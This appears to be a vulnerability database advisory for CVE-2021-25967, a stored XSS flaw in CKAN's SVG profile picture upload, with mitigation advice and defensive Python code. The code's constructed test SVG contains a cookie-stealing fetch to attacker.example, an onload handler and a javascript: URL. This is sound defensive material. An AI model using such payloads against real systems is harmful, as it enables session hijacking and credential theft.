
CVE-2021-25967: CWE-79 Cross-site Scripting (XSS) in ckan ckan

Medium
Tags: Vulnerability, CVE-2021-25967, cve, cve-2021-25967, cwe-79
Published: Wed Dec 01 2021 (12/01/2021, 13:40:09 UTC)
Source: CVE
Vendor/Project: ckan
Product: ckan

Description

In CKAN, versions 2.9.0 to 2.9.3 are affected by a stored XSS vulnerability via SVG file upload of users’ profile picture. This allows low privileged application users to store malicious scripts in their profile picture. These scripts are executed in a victim’s browser when they open the malicious profile picture.

AI-Powered Analysis

Last updated: 06/25/2025, 09:16:21 UTC

Technical Analysis

CVE-2021-25967 is a stored cross-site scripting (XSS) vulnerability affecting CKAN versions 2.9.0 through 2.9.3. CKAN is an open-source data management system widely used for publishing and sharing datasets. The flaw is that profile picture uploads are neither restricted to safe raster formats nor sanitized when they are SVG. An SVG file is an XML document and may carry active content: <script> elements, on* event-handler attributes (for example onload on the root element) and javascript: URLs in href attributes. Any authenticated low-privileged user can therefore store a script-bearing SVG as their avatar. A practical caveat on the trigger: browsers never execute script inside an SVG that is rendered through an <img> element, so the payload does not fire merely because the avatar appears on a page. It fires when the victim opens the stored SVG directly as a document, and because the file is served from the application's own origin the script then runs with access to the victim's CKAN session and can hijack it, steal credentials, or perform actions on the victim's behalf. Exploitation thus requires an attacker account able to upload a profile picture and a victim, typically an administrator inspecting the user, who opens the image. The CVSS v3.1 base score is 5.4 (medium severity), reflecting network attack vector, low attack complexity and low privileges required, offset by the need for user interaction and by limited confidentiality and integrity impact with no availability impact. No known public exploits have been reported. The vulnerability is categorized under CWE-79, improper neutralization of input during web page generation. The scope is changed (S:C): the vulnerable component is the CKAN server, but the impact lands in other users' browsers. No official patches are linked in the provided data; remediation typically means allowing only raster image formats (validated by content, not by file extension), sanitizing SVG uploads if they must be kept, and serving stored uploads so that they cannot execute in the application origin. In collaborative data-sharing deployments the vulnerability is a natural vector for targeted attacks against administrators.

Potential Impact

For European organizations running CKAN versions 2.9.0 to 2.9.3, this vulnerability allows client-side code execution inside a trusted application. An attacker with a low-privileged account can embed a script in a profile picture; when another user opens it, the script runs in that user's browser with that user's session, which can lead to session hijacking, data theft, or, if the victim is an administrator, privilege escalation within the application. This threatens the confidentiality and integrity of sensitive datasets managed via CKAN portals. Given CKAN's use in government, research institutions, and open data portals across Europe, exploitation could undermine trust in the integrity of published data. Availability is not directly affected, but a breach of confidentiality or integrity could lead to reputational damage, regulatory exposure (e.g. under GDPR), and operational disruption. The requirement for user interaction (opening the malicious profile picture) limits automated exploitation but does not eliminate the risk, especially where administrators routinely review user accounts. The medium CVSS score reflects these factors, but the impact can be significant in high-value data contexts.

Mitigation Recommendations

1. Upgrade CKAN installations to a version later than 2.9.3 in which this vulnerability is fixed, or apply vendor-provided patches if available.
2. Validate profile picture uploads server-side by content: sniff the magic bytes and accept only raster formats (PNG, JPEG, GIF), rejecting SVG regardless of file extension or declared MIME type. If SVG must be allowed, strip script elements, on* event-handler attributes and javascript:/data: URLs before storing the file.
3. Serve stored uploads so that they cannot execute in the application origin: send Content-Disposition: attachment, X-Content-Type-Options: nosniff and a restrictive Content-Security-Policy (the sandbox directive is effective here), or host user uploads on a separate origin altogether.
4. Audit existing user-uploaded profile pictures and remove any SVG files, or re-run them through the sanitizer.
5. Limit profile picture upload permissions to trusted users or administrators where feasible.
6. Warn administrators and users not to open profile pictures as standalone files from untrusted accounts, and to report suspicious behaviour.
7. Monitor web application logs for SVG uploads to the user image endpoint and for unusual requests to stored upload URLs.
8. Consider a web application firewall (WAF) with rules that flag script, on* attributes and javascript: URLs in uploaded SVG bodies; treat this as defence in depth, not as the fix.
9. Review user privilege assignments to minimise the number of low-privileged accounts able to upload files.
Combined, these measures reduce the attack surface and mitigate exploitation risk beyond generic advice.
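The following is an added example, not CKAN's own code, showing items 2 and 3 above in working Python: content sniffing that rejects SVG regardless of filename, a minimal sanitizer for deployments that must keep SVG, and response headers that stop a stored SVG from running in the application origin even if one slips through. The helper names (accept_profile_picture, sanitize_svg, storage_response_headers) are assumed for illustration and the sample SVG is constructed, not a payload from the CVE.

```python
"""Added example: upload gate for profile pictures (not CKAN's code)."""
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Magic bytes of the raster formats a profile picture actually needs.
RASTER_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Elements that carry or load active content; removed together with their subtree.
ACTIVE_ELEMENTS = {"script", "foreignObject", "use", "animate", "set"}
# URL schemes that execute or load code when the SVG is opened as a document.
DANGEROUS_URL = re.compile(r"^\s*(javascript|data|vbscript):", re.IGNORECASE)


def sniff_image_type(data: bytes) -> Optional[str]:
    """Classify an upload by its bytes, never by filename or declared MIME type."""
    for magic, mime in RASTER_SIGNATURES.items():
        if data.startswith(magic):
            return mime
    head = data.lstrip()[:256].lower()
    if head.startswith(b"<?xml") or head.startswith(b"<svg"):
        return "image/svg+xml"
    return None


def accept_profile_picture(data: bytes) -> bool:
    """Strategy 1 (preferred): allowlist sniffed raster types; SVG is rejected."""
    return sniff_image_type(data) in ("image/png", "image/jpeg", "image/gif")


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def sanitize_svg(data: bytes) -> str:
    """Strategy 2 (only if SVG must be kept): strip active content.

    Removes script-bearing elements, on* event handlers and javascript:/data:
    URLs. In production parse with defusedxml to also block entity-expansion
    attacks; this minimal sanitizer is illustrative, not exhaustive.
    """
    root = ET.fromstring(data)
    if _local(root.tag) != "svg":
        raise ValueError("not an SVG document")
    # Collect first, then remove, so the tree is not mutated while iterating.
    doomed = [(p, c) for p in root.iter() for c in list(p)
              if _local(c.tag) in ACTIVE_ELEMENTS]
    for parent, child in doomed:
        parent.remove(child)
    for el in root.iter():
        for attr, value in list(el.attrib.items()):
            name = _local(attr).lower()
            if name.startswith("on") or (name == "href" and DANGEROUS_URL.match(value)):
                del el.attrib[attr]
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root, encoding="unicode")


def storage_response_headers() -> dict:
    """Headers for serving any stored upload (mitigation 3).

    attachment: a direct visit downloads the file instead of rendering it;
    nosniff: the browser must not reinterpret the declared type;
    sandbox CSP: if it is ever rendered, it gets an opaque origin and no script.
    """
    return {
        "Content-Disposition": "attachment",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }


# Constructed sample of the kind of SVG the advisory describes (not from the CVE).
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="alert(document.cookie)">
  <circle cx="20" cy="20" r="10"/>
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text y="40">click</text></a>
</svg>
"""
# Constructed sample: the first bytes of a genuine PNG renamed to "avatar.svg".
RENAMED_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    print("svg accepted by allowlist:", accept_profile_picture(MALICIOUS_SVG))  # False
    print("renamed png accepted:", accept_profile_picture(RENAMED_PNG))  # True
    print(sanitize_svg(MALICIOUS_SVG))
```

The allowlist is the recommended path: an avatar has no need for SVG, and rejecting by sniffed content defeats both renamed files and spoofed Content-Type headers. The sanitizer is deliberately an element and attribute denylist, which is why it should be paired with the serving headers: anything the denylist misses still lands in a downloaded, sandboxed, opaque-origin document rather than in the CKAN session.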


Technical Details

Data Version
5.1
Assigner Short Name
Mend
Date Reserved
2021-01-22T00:00:00.000Z
CISA Enriched
true
Cvss Version
3.1
State
PUBLISHED

Threat ID: 682d983bc4522896dcbedcc4

Added to database: 5/21/2025, 9:09:15 AM

Last enriched: 6/25/2025, 9:16:21 AM

Last updated: 8/7/2025, 10:30:56 PM
